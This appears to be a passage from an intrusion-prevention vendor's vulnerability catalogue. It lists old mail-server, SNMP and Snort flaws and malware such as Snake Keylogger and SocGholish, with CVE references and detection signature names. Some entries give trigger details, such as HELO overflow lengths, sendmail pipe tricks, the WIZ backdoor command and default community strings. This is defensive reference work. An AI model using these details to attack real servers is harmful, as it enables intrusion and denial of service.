SMTP-MDaemon-Helo-BOF

About this vulnerability: SMTP MDaemon Helo BOF
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MDaemon
Type: Buffer Overflow
Description: MDaemon SMTP Server contains a buffer overflow vulnerability in HELO argument processing.
Situation: SMTP_Helo-Overflow
References:
CVE-1999-0284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0284
Back to top

SMTP-Mercury-Mail-Transport-System-SMTP-Auth-Cram-md5-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Mercury Mail Transport System
Risk: High
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mercury Mail Transport System
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Mercury Mail Transport System. A remote attacker can exploit this vulnerability by sending a crafted CRAM-MD5 response string to a vulnerable SMTP server to compromise the system.
Situation: SMTP_Mercury-Mail-Transport-System-SMTP-Auth-Cram-md5-Buffer-Overflow
References:
CVE-2007-4440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4440
BID-25357
http://www.securityfocus.com/bid/25357
Back to top

SMTP-Microsoft-Collaboration-Data-Objects-BOF

About this vulnerability: Buffer overflow vulnerability in Microsoft Collaboration Data Objects (CDO). MS05-048
Risk: Critical
First detected in: sgpkg-ips-42-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Collaboration Data Objects
Type: Buffer Overflow
Description: Microsoft Collaboration Data Objects (CDO) suffer from a buffer overflow in the handling of mail message headers. Message headers are copied into a fixed size buffer without sufficient boundary validation, leading to a buffer overflow with sufficiently long headers. The vulnerability can be exploited by remote attackers to execute arbitrary code with SYSTEM privileges on the vulnerable system.
Situation: E-Mail_HCS-Microsoft-Collaboration-Data-Objects-BOF
References:
CVE-2005-1987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1987
BID-15067
http://www.securityfocus.com/bid/15067
OSVDB-19905
http://www.osvdb.org/19905
MS05-048
http://technet.microsoft.com/security/bulletin/MS05-048
Back to top

SMTP-Msgcore-DoS

About this vulnerability: SMTP Msgcore DoS
Risk: Low
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 95; Windows NT
Software: Nosque Workshop MsgCore
Type: Malfunction
Description: Multiple sequences of "HELO/ MAIL FROM/ RCPT TO / DATA" commands in single connection causes memory leak that will lead into a denial of service condition.
Situation: SMTP_RCPT-To-BOF
References:
CVE-2000-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0075
BID-895
http://www.securityfocus.com/bid/895
Back to top

SMTP-Netscape-Messaging-Server-RCPT-To-DoS

About this vulnerability: Netscape Messaging Server Denial of Service via multiple RCPT to commands
Risk: Low
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Netscape Messaging Server
Type: Malfunction
Description: Large amounts of rcpt to commands with long argument cuases resource starvation and thus lead into a denial of service situation.
Situation: SMTP_RCPT-To-BOF
References:
CVE-1999-1532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1532
BID-748
http://www.securityfocus.com/bid/748
Back to top

SMTP-Notes-Relay

About this vulnerability: SMTP Notes Relay
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Notes
Type: Misconfiguration
Description: Some versions of Notes SMTP server have a bug that allows mail to be relayed even relaying should be denied. This can be used in spamming purposes.
Situation: SMTP_Lotus-Notes-Relay
References:
CVE-2001-1445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1445
Back to top

SMTP-Novell-Groupwise-RCPT-To-BOF

About this vulnerability: GroupWise SMTP Server RCPT TO buffer overflow
Risk: High
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell GroupWise
Type: Buffer Overflow
Description: Buffer overflow in Novell GroupWise 6.0.1 mail server RCPT To argument processing allows remote attacker to execute arbitraty commands in the server.
Situation: SMTP_RCPT-To-BOF
References:
CVE-2002-1088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1088
BID-5313
http://www.securityfocus.com/bid/5313
Back to top

SMTP-Pipe-Sendmail-Attack

About this vulnerability: SMTP Pipe Sendmail vulnerability
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Sendmail
Type: Metacharacter
Description: Very old versions of sendmail contain a vulnerability where clever use of pipe in MAIL from: or RCPT to: command cause mail contents to be executed in shell in the sendmail server. The impact is remote root.
Situation: SMTP_Mail-From-Pipe
SMTP_Mail-RCPT-To-Pipe
References:
CVE-1999-0203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203
Back to top

SMTP-Qk-SMTP-Server-RCPT-To-Command-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in QK SMTP Server
Risk: High
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: QK SMTP Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in QK SMTP Server. The vulnerability allows a remote attacker to cause a DoS or compromise the vulnerable system.
Situation: SMTP_RCPT-To-BOF
References:
CVE-2006-5551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5551
BID-20681
http://www.securityfocus.com/bid/20681
Back to top

SMTP-RCPT-To-Decode

About this vulnerability: SMTP Rcpt To Decode
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Sendmail
Type: Metacharacter
Description: Old Sendmail versions allow forwarding e-mail to the uudecode program. This can be exploited to overwrite arbitrary files with arbitrary content. This can lead to a remote root compromise.
Situation: SMTP_RCPT-To-Decode
References:
CVE-1999-0203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203
Back to top

SMTP-RCPT-To-File

About this vulnerability: SMTP Rcpt to file
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Sendmail
Type: Metacharacter
Description: In old sendmail versions if was possible to send mail directly into a file. This will enable a remote intruder to gain remote root access on the system.
Situation: SMTP_RCPT-To-File
References:
CVE-1999-0203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203
Back to top

SMTP-Sendmail-Header-BOF

About this vulnerability: Sendmail header parsing vulnerability
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sendmail
Type: Buffer Overflow
Description: Sendmail contains a buffer overflow error in the header parsing functionality which can allow the attacker to gain elevated system privileges on the victim host.
Situation: E-Mail_HCS-Mail-Hdr-Sendmail-Header-BOF
References:
CVE-2002-1337
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1337
BID-6991
http://www.securityfocus.com/bid/6991
Back to top

SMTP-Sendmail-Helo-Hide-Sender-BOF

About this vulnerability: Sendmail HELO command buffer overflow
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Sendmail
Type: Buffer Overflow
Description: Some Sendmail versions have a buffer overflow vulnerability in HELO argument processing that causes loss of the mail sender information. This can be exploited to hide the mail sender.
Situation: SMTP_Helo-Overflow
References:
CVE-1999-0098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0098
Back to top

SMTP-Sendmail-Nochar-BOF

About this vulnerability: NOCHAR buffer-overflow vulnerability in sendmail
Risk: Moderate
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sendmail
Type: Malfunction
Description: Sendmail versions prior to 8.12.8 are vulnerable to a buffer-overflow exploit. Due to a programming error conversions between characters and integers are not handled correctly, which allows remote attackers to cause a denial of service and possibly execute arbitrary code as root.
Situation: SMTP_Sendmail-Nochar-BOF
References:
CVE-2003-0161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0161
BID-7230
http://www.securityfocus.com/bid/7230
Back to top

SMTP-Sendmail-Prescan-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Sendmail prescan function
Risk: Moderate
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sendmail
Type: Buffer Overflow
Description: Sendmail versions prior to 8.12.9 suffer from a buffer overflow vulnerability due to an error in the prescan function. A successful attack allows remote attackers to execute arbitrary code on a vulnerable system.
Situation: SMTP_Sendmail-Nochar-BOF
References:
CVE-2003-0694
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0694
Back to top

SMTP-Sendmail-Timeout-Buffer-Overflow

About this vulnerability: Sendmail buffer overflow vulnerability related to a race condition in session timeouts
Risk: High
First detected in: sgpkg-ips-62-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Sendmail
Type: Buffer Overflow
Description: Sendmail has a vulnerability relating to SMTP message timeouts. Sendmail defines time limits for clients to transfer e-mail messages (by default one hour to tranfer the message body). There is a race condition in the handling of the message timemouts, and associated integer overflows which possibly allow arbitrary code execution with a specially crafted SMTP session.
Situation: SMTP_Sendmail-Timeout-Race-Condition
References:
CVE-2006-0058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0058
BID-17192
http://www.securityfocus.com/bid/17192
OSVDB-24037
http://www.osvdb.org/24037
Back to top

SMTP-Server-HELP-Command-Buffer-Overflow

About this vulnerability: A vulnerability in Chameleon SMTPd
Risk: High
First detected in: sgpkg-ips-333-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NetManage Chameleon
Type: Buffer Overflow
Description: There exists buffer overflow vulnerabilities in the NetManage Chameleon SMTPd. Exploitation of these vulnerabilities may lead into service crash or remote compromise.
Situation: SMTP_Help-Overflow
References:
CVE-1999-0261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0261
BID-33560
http://www.securityfocus.com/bid/33560
Back to top

SMTP-SpamAssassin-Malformed-Email-Header-DoS

About this vulnerability: SpamAssassin malformed email header denial of service vulnerability
Risk: Moderate
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SpamAssassin
Type: Resource Starvation
Description: Apache SpamAssassin 3.0.3 and prior has a denial of service vulnerability. A remote attacker can exploit this vulnerability by sending an SMTP message, or to enforce the outcome multiple SMTP messages, with a crafted "Content-Type" header field to the target server, which can consume 100 % of the server's CPU resources causing a temporary denial of service condition.
Situation: E-Mail_HCS-SpamAssassin-Malformed-Email-Header-DoS
References:
CVE-2005-1266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1266
BID-13978
http://www.securityfocus.com/bid/13978
OSVDB-17346
http://www.osvdb.org/17346
Back to top

SMTP-SquirrelMail-Content-Type-Header-Cross-Site-Scripting

About this vulnerability: A vulnerability in SquirrelMail allows cross site scripting
Risk: Low
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SquirrelMail
Type: Cross-site Scripting
Description: There is a cross site scripting vulnerability in SquirrelMail. A crafted Content-Type header can be used to execute JavaScript in the context of the SquirrelMail session. This may lead to information forgery.
Situation: E-Mail_HCS-SquirrelMail-Content-Type-Header-Cross-Site-Scripting
References:
CVE-2004-0520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0520
BID-10439
http://www.securityfocus.com/bid/10439
Back to top

SMTP-Src-Helo-BOF

About this vulnerability: SMTP Src Helo BOF
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Silent Runner Collector (SRC)
Type: Buffer Overflow
Description: A buffer overflow vulnerability that can be exploited by sending a long argument in HELO command.
Situation: SMTP_Helo-Overflow
References:
CVE-2001-0397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0397
Back to top

SMTP-VirusWall-Helo-BOF

About this vulnerability: SMTP VirusWall Helo BOF
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT
Software: InterScan VirusWall
Type: Buffer Overflow
Description: A buffer overflow vulnerability that can be exploited by sending a long argument in HELO command.
Situation: SMTP_Helo-Overflow
References:
CVE-1999-1529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1529
BID-787
http://www.securityfocus.com/bid/787
Back to top

SMTP-Winsmtp-Helo-BOF

About this vulnerability: SMTP Winsmtp Helo BOF
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WinSMTP
Type: Buffer Overflow
Description: WinSMTP contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command. An argument of 170 bytes or more triggers the overflow.
Situation: SMTP_Helo-Overflow
References:
CVE-2000-0833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0833
BID-1680
http://www.securityfocus.com/bid/1680
Back to top

SMTP-Wiz-Backdoor

About this vulnerability: SMTP WIZ Backdoor
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Sendmail
Type: Backdoor
Description: Very old versions of sendmail contain a backdoor, mistakenly left there by some developer. In current versions this backdoor is of course removed. This backdoor can be accessed via command WIZ.
Situation: SMTP_Wiz-Detect
References:
CVE-1999-0145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145
Back to top

SMTP-Xtramail-Helo-BOF

About this vulnerability: SMTP Xtramail Helo BOF
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Artisoft XtraMail
Type: Buffer Overflow
Description: Artisoft XtraMail contains a buffer overflow vulnerability that can be exploited by sending a long argument in HELO command. An argument of 10000 bytes or more triggers the overflow.
Situation: SMTP_Helo-Overflow
References:
CVE-1999-1511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1511
BID-791
http://www.securityfocus.com/bid/791
Back to top

SMTP_Citadel-SMTP-RCPT-To-Remote-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Citadel SMTP server
Risk: High
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Citadel Server
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Citadel SMTP Server. The vulnerability is due to insufficient boundary check when processing user provided data. Remote attackers could exploit this vulnerability by supplying a specially crafted RCPT TO command to the server. Successful exploitation of this vulnerability allows remote attackers execute arbitrary code with the privileges of the affected application.
Situation: SMTP_Citadel-SMTP-RCPT-To-Buffer-Overflow
SMTP_RCPT-To-BOF
References:
CVE-2008-0394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0394
BID-27376
http://www.securityfocus.com/bid/27376
Back to top

Snake-Keylogger-Infection-Traffic

About this vulnerability: Snake Keylogger infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Snake Keylogger infection traffic was detected.
Situation: SMTP_CS-Snake-Keylogger-Infection-Traffic
FTP_CS-Snake-Keylogger-Infection-Traffic
Back to top

SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471

About this vulnerability: An attempt to exploit a vulnerability in SnakeYaml detected
Risk: High
First detected in: sgpkg-ips-1663-5242
Last changed: sgpkg-ips-1665-5242
Platform: Generic
Software: SnakeYaml
Type: Input Validation
Description: SnakeYaml's constructor class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. SnakeYaml's SafeConsturctor, on the other hand, is not vulnerable.
Situation: File-Text_SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471
File-Text_Potential-SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471
File-TextId_SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471
References:
CVE-2022-1471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1471
Back to top

Snap-Creek-Duplicator-Wordpress-Plugin-Code-Injection

About this vulnerability: A vulnerability in Snap Creek Duplicator
Risk: High
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Snap Creek Duplicator
Type: Code Injection
Description: A vulnerability in Snap Creek Duplicator WordPress plugin, versions <= 1.2.40, which allows remote attackers to execute arbitrary PHP code by allowing anyone to call a function that can overwrite the wp-config.php file, due to improper sanitization of the POST parameters.
Situation: HTTP_CSU-Snap-Creek-Duplicator-Wordpress-Plugin-Code-Injection
References:
CVE-2018-17207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17207
Back to top

SNIProxy-New_address-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in SNIProxy
Risk: Moderate
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Platform: Generic
Software: SNIProxy
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported for SNIProxy. The vulnerability is due to lack of proper validation of the length of the Host header or SNI data prior to copying it to a fixed-length stack buffer. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP or TLS packet to the vulnerable server. Successful exploitation could result in execution of arbitrary code in the security context of the vulnerable service.
Situation: TLS-SNI_SNIProxy-New_address-Stack-Buffer-Overflow
HTTP_CSH-SNIProxy-New_address-Stack-Buffer-Overflow
References:
CVE-2023-25076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25076
Back to top

SNMP-Castle-Rock-Computing-SNMPc-Network-Manager-Community-String-BOF

About this vulnerability: Buffer overflow vulnerability in Castle Rock Computing SNMPc Network Manager
Risk: High
First detected in: sgpkg-ips-153-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Castle Rock Computing SNMPc Network Manager
Type: Buffer Overflow
Description: Castle Rock Computing SNMPc Network Manager has a buffer overflow vulnerability in the handling of the community string in the SNMP Trap message. Exploiting this issue allows an attacker to cause a denial of service condition or compromise the vulnerable system.
Situation: SNMP-UDP_Castle-Rock-Computing-SNMPc-Network-Manager-Community-String-BOF
References:
CVE-2008-2214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2214
BID-28990
http://www.securityfocus.com/bid/28990
OSVDB-44885
http://www.osvdb.org/44885
Back to top

SNMP-Common-Unix-Printing-System-ASN1-BOF

About this vulnerability: Common UNIX Printing System SNMP ASN1 Remote Buffer Overflow Vulnerability
Risk: High
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Common UNIX Printing System
Type: Buffer Overflow
Description: Common UNIX Printing System (CUPS) has a remote buffer-overflow vulnerability in its SNMP management code. Exploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected software. Failed exploit attempts will likely result in denial-of-service conditions.
Situation: SNMP-UDP_CUPS-BOF
References:
CVE-2007-5849
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5849
BID-26917
http://www.securityfocus.com/bid/26917
Back to top

SNMP-Default-Community-String-Usage

About this vulnerability: Usage of default community string in SNMP
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SNMP Agent
Type: Insecure Configuration
Description: Some SNMP systems may use the default community strings. An attacker could get access to sensitive information on the target machine by using these known community strings.
Situation: SNMP-UDP_Write-Attempt-Using-Default-Community-String
SNMP-UDP_Default-Community-String-Accepted
SNMP-UDP_Default-Community-String-Rejected
SNMP-UDP_Default-Community-String-Public-Accepted
References:
CVE-1999-0517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0517
Back to top

SNMP-Default-Community-String-WINS-DoS

About this vulnerability: WINS Database records can be deleted via SNMP
Risk: Moderate
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT 4.0
Software: <os>
Type: Insecure Configuration
Description: All records in a WINS database can be deleted through SNMP using default community strings for a denial of service. Vulnerability is known to exist in some versions of Windows NT 4. It is patched in SP6.
Situation: SNMP-UDP_WINS-Delete-DoS
References:
CVE-1999-0294
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0294
BID-2244
http://www.securityfocus.com/bid/2244
OSVDB-3114
http://www.osvdb.org/3114
Back to top

SNMP-Linux-Kernel-SNMP-NAT-Helper-SNMP-Trap-Decode-DoS

About this vulnerability: Denial of service vulnerability in Linux kernel SNMP handling code
Risk: Moderate
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Malfunction
Description: The SNMP NAT helper for Linux kernels before 2.6.16.18 suffers from a vulnerability that allows remote attackers to cause a denial of service via a crafted SNMP packet.
Situation: SNMP-UDP_Linux-Kernel-SNMP-NAT-Helper-SNMP-Trap-Decode-DoS
References:
CVE-2006-2444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2444
BID-18081
http://www.securityfocus.com/bid/18081
OSVDB-25750
http://www.osvdb.org/25750
Back to top

SNMP-Microsoft-SNMP-Service-Buffer-Overflow

About this vulnerability: Microsoft SNMP Service contains suffers buffer overflow
Risk: Moderate
First detected in: sgpkg-ips-87-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003
Software: <os>
Type: Buffer Overflow
Description: There is a remote code execution vulnerability in Microsoft SNMP service. The vulnarability is caused by the insufficient validation of certain certain parameters of the SNMP request.
Situation: SNMP-UDP_Microsoft-SNMP-Service-Buffer-Overflow
SNMP-UDP_GetBulkRequest-With-Nonzero-Nonrepeaters-And-Maxrepeaters-Values
SNMP-UDP_GetBulkRequest-With-Nonzero-Nonrepeaters-And-Large-Maxrepeaters-Value
References:
CVE-2006-5583
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5583
BID-21537
http://www.securityfocus.com/bid/21537
MS06-074
http://technet.microsoft.com/security/bulletin/MS06-074
Back to top

SNMP-Nodemanager-SNMP-Trap-Buffer-Overflow

About this vulnerability: Nodemanager Professional stack overflow vulnerability
Risk: High
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: NodeManager Professional
Type: Buffer Overflow
Description: Nodemanager Professional displays and logs SNMP traps. While the trap packets are parsed, their values are copied into a 512-byte buffer without checking the size of the value. This allows remote attackers to execute arbitrary code on the machine that runs Nodemanager by sending a malicious SNMP trap packet to overflow the buffer.
Situation: SNMP-UDP_Nodemanager-SNMP-Trap-Buffer-Overflow
References:
CVE-2005-0185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0185
BID-12283
http://www.securityfocus.com/bid/12283
Back to top

SNMP-Trap-Service-GET-Request-DoS

About this vulnerability: A denial of service vulnerability in SNMP trap handling.
Risk: High
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SNMP Trap
Type: Malfunction
Description: A denial of service vulnerability in many versions of SNMP implementations which allow remote attackers to cause a denial of service or gain privileges and compromise the system via SNMPv1 trap handling.
Situation: SNMP-UDP_SNMP-Trap-Service-GET-Request-DoS
References:
CVE-2002-0012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0012
BID-4088
http://www.securityfocus.com/bid/4088
OSVDB-810
http://www.osvdb.org/810
MS02-006
http://technet.microsoft.com/security/bulletin/MS02-006
Back to top

Snort-Back-Orifice-Pre-Processor-Buffer-Overflow

About this vulnerability: A vulnerability in Snort Project Snort
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Snort
Type: Malfunction
Description: There is a buffer overflow vulnerability in Snort. The flaw is caused by insufficient boundary checks in the handling of Back Orifice messages. An attacker may leverage this vulnerability to execute arbitrary code in the security context of the affected product, normally root. In a successful attack, where an attacker injects code into the vulnerable target, the behaviour of the target host is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of the attack attempt. Note that any code executed by the attacker runs with the privileges of the affected product, normally root on Unix-like systems.
Situation: Generic_UDP-Snort-Back-Orifice-Pre-Processor-Buffer-Overflow
References:
CVE-2005-3252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3252
BID-15131
http://www.securityfocus.com/bid/15131
OSVDB-20034
http://www.osvdb.org/20034
Back to top

Snort-DCE/RPC-Preprocessor-Stack-Based-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in the Snort DCE/RPC preprocessor.
Risk: High
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Snort
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in the Snort DCE/RPC preprocessor, versions before 2.6.1.3 and 2.7 before beta 2, which allows remote attackers to execute arbitrary code via crafted SMB traffic.
Situation: SMB-TCP_-Snort-DCE/RPC-Preprocessor-Stack-Based-Buffer-Overflow
References:
CVE-2006-5276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276
BID-22616
http://www.securityfocus.com/bid/22616
OSVDB-32094
http://www.osvdb.org/32094
Back to top

Snort-frag3-Preprocessor-Fragmented-IP-Packet-Detection-Evasion

About this vulnerability: A Snort frag3 Preprocessor Fragmented IP Packet Detection Evasion vulnerability
Risk: High
First detected in: sgpkg-ips-1001-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Snort
Type: Malfunction
Description: A vulnerability in Snort Intrusion Detection System which allows remote attackers to evade security due to the improper processing of fragmented IP packets, as the frag3 preprocessor does not check for ip_option_length bytes at the end of the IP options when reassembling the fragmented packets.
Situation: Generic_UDP-Snort-frag3-Preprocessor-Fragmented-IP-Packet-Detection-Evasion
References:
CVE-2006-0839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0839
Back to top

SoapUI-WSDL-Remote-Code-Execution-CVE-2014-1202

About this vulnerability: A vulnerability in SoapUI
Risk: High
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Platform: Generic
Software: SoapUI
Type: Input Validation
Description: A vulnerability in SoapUI versions before 4.6.4 allows a remote attacker to execute arbitrary Java code by enticing the target user into opening a maliciously crafted WSDL file.
Situation: File-TextId_SoapUI-WSDL-Remote-Code-Execution-CVE-2014-1202
References:
CVE-2014-1202
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1202
Back to top

SocGholish-Framework-Activity

About this vulnerability: SocGholish framework activity was detected
Risk: High
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1536-5242
Platform: Windows
Software: <os>
Type: Javascript Injection
Description: SocGholish is a malicious Javascript framework. It typically masquerades as a browser update download and is used to distribute malware.
Situation: HTTP_CSU-SocGholish-Framework-HTTP-Request
File-Text_SocGholish-Framework-Injected-Script
File-Text_SocGholish-Zip-File
Back to top

SOCKS4-Protocol

About this vulnerability: SOCKS4 protocol
Risk: Low
First detected in: sgpkg-ips-322-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: <os>
Type: Browser
Description: SOCKS4 is a protocol that enables the routing of network packets between client-server applications via a proxy server.
Situation: Shared_TCP-CS-SOCKS4-Connection-Request
Shared_SS-SOCKS4-Connection-Request-Accepted
Shared_SS-SOCKS4-Connection-Request-Failed
Back to top

SOCKS5-Protocol

About this vulnerability: SOCKS5 protocol
Risk: Low
First detected in: sgpkg-ips-322-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: <os>
Type: Browser
Description: SOCKS5 is a protocol that enables the routing of network packets between client-server applications via a proxy server.
Situation: Shared_TCP-CS-SOCKS5-Connection-Request
Shared_SS-SOCKS5-Connection-Request-Accepted
Shared_SS-SOCKS5-Connection-Request-Failed
Back to top

Soda-PDF-Insecure-Library-Loading

About this vulnerability: A vulnerability in LULU Software Soda PDF
Risk: Moderate
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1640-5242
Platform: Generic
Software: LULU Software Soda PDF
Type: Malfunction
Description: There is a code execution vulnerability in Soda PDF. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to process a PDF file from a malicious source. A successful attack would result in execution of arbitrary code in the security context of the affected application.
Situation: HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS_Soda-PDF-Insecure-Library-Loading
References:
CVE-2013-3485
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3485
OSVDB-96228
http://www.osvdb.org/96228
Back to top

SoftiaCom-WMailserver-Buffer-Overflow

About this vulnerability: A SoftiaCom WMailserver Buffer Overflow vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SoftiaCom WMailserver
Type: Buffer Overflow
Description: A buffer overflow vulnerability in SoftiaCom WMailserver, versions 1.0 and 2.0, which allows remote attackers to execute arbitrary code via a long TCP packet with a leading space.
Situation: SMTP_CS-SoftiaCom-WMailserver-Buffer-Overflow
References:
CVE-2005-2287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2287
BID-14213
http://www.securityfocus.com/bid/14213
OSVDB-17883
http://www.osvdb.org/17883
Back to top

Softing-Edgeaggregator-Restore-Configuration-Directory-Traversal

About this vulnerability: A vulnerability in Softing edgeAggregator
Risk: High
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Platform: Generic
Software: Softing edgeAggregator
Type: Directory Traversal
